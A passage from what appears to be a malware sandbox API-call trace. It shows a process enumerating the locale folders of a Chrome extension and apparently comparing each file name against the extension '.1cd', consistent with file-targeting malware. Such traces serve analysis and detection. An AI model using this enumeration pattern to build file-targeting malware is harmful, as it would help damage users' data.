cAlternateFileName="")) returned 1 [0052.785] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da") returned 139 [0052.785] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85217f70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85217f70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef16c0 [0052.786] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85217f70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85217f70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.786] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85218f10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.786] lstrlenW (lpString="messages.json") returned 13 [0052.786] lstrlenW (lpString=".1cd") returned 4 [0052.786] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85218f10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.786] FindClose (in: hFindFile=0x3ef16c0 | out: hFindFile=0x3ef16c0) returned 1 [0052.786] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4042520 | out: hHeap=0x570000) returned 1 [0052.786] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85217f70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85217f70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de", cAlternateFileName="")) returned 1 [0052.786] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de") returned 139 [0052.786] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85217f70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85217f70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef16c0 [0052.786] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85217f70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85217f70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.786] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85218f10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.786] lstrlenW (lpString="messages.json") returned 13 [0052.786] lstrlenW (lpString=".1cd") returned 4 [0052.786] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85218f10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.786] FindClose (in: hFindFile=0x3ef16c0 | out: hFindFile=0x3ef16c0) returned 1 [0052.787] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4042520 | out: hHeap=0x570000) returned 1 [0052.787] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85217f70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85217f70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el", cAlternateFileName="")) returned 1 [0052.787] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el") returned 139 [0052.787] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85217f70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85217f70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef16c0 [0052.787] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85217f70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85217f70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.787] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85218f10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.787] lstrlenW (lpString="messages.json") returned 13 [0052.787] lstrlenW (lpString=".1cd") returned 4 [0052.787] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85218f10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.787] FindClose (in: hFindFile=0x3ef16c0 | out: hFindFile=0x3ef16c0) returned 1 [0052.787] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4042520 | out: hHeap=0x570000) returned 1 [0052.787] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85217f70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85217f70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0052.787] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en") returned 139 [0052.787] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85217f70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85217f70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef16c0 [0052.787] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85217f70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85217f70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.787] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85218f10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.787] lstrlenW (lpString="messages.json") returned 13 [0052.788] lstrlenW (lpString=".1cd") returned 4 [0052.788] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85218f10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.788] FindClose (in: hFindFile=0x3ef16c0 | out: hFindFile=0x3ef16c0) returned 1 [0052.788] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4042520 | out: hHeap=0x570000) returned 1 [0052.788] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8523e0d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8523e0d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es", cAlternateFileName="")) returned 1 [0052.788] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es") returned 139 [0052.788] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8523e0d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8523e0d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef16c0 [0052.788] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85217f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8523e0d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8523e0d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.788] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8523d900, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.788] lstrlenW (lpString="messages.json") returned 13 [0052.788] lstrlenW (lpString=".1cd") returned 4 [0052.788] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8523d900, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.788] FindClose (in: hFindFile=0x3ef16c0 | out: hFindFile=0x3ef16c0) returned 1 [0052.788] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4042520 | out: hHeap=0x570000) returned 1 [0052.788] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8523e0d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8523e0d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi", cAlternateFileName="")) returned 1 [0052.788] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi") returned 139 [0052.788] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8523e0d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8523e0d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef16c0 [0052.789] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8523e0d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8523e0d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.789] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8523d900, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.789] lstrlenW (lpString="messages.json") returned 13 [0052.789] lstrlenW (lpString=".1cd") returned 4 [0052.789] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8523d900, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.789] FindClose (in: hFindFile=0x3ef16c0 | out: hFindFile=0x3ef16c0) returned 1 [0052.789] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4042520 | out: hHeap=0x570000) returned 1 [0052.789] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8523e0d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8523e0d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fil", cAlternateFileName="")) returned 1 [0052.789] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil") returned 140 [0052.789] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8523e0d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8523e0d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef16c0 [0052.789] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8523e0d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8523e0d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.789] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8523d900, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.789] lstrlenW (lpString="messages.json") returned 13 [0052.789] lstrlenW (lpString=".1cd") returned 4 [0052.789] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8523d900, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.789] FindClose (in: hFindFile=0x3ef16c0 | out: hFindFile=0x3ef16c0) returned 1 [0052.789] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4042520 | out: hHeap=0x570000) returned 1 [0052.790] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8523e0d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8523e0d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr", cAlternateFileName="")) returned 1 [0052.790] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr") returned 139 [0052.790] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8523e0d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8523e0d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef16c0 [0052.790] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8523e0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8523e0d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8523e0d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, 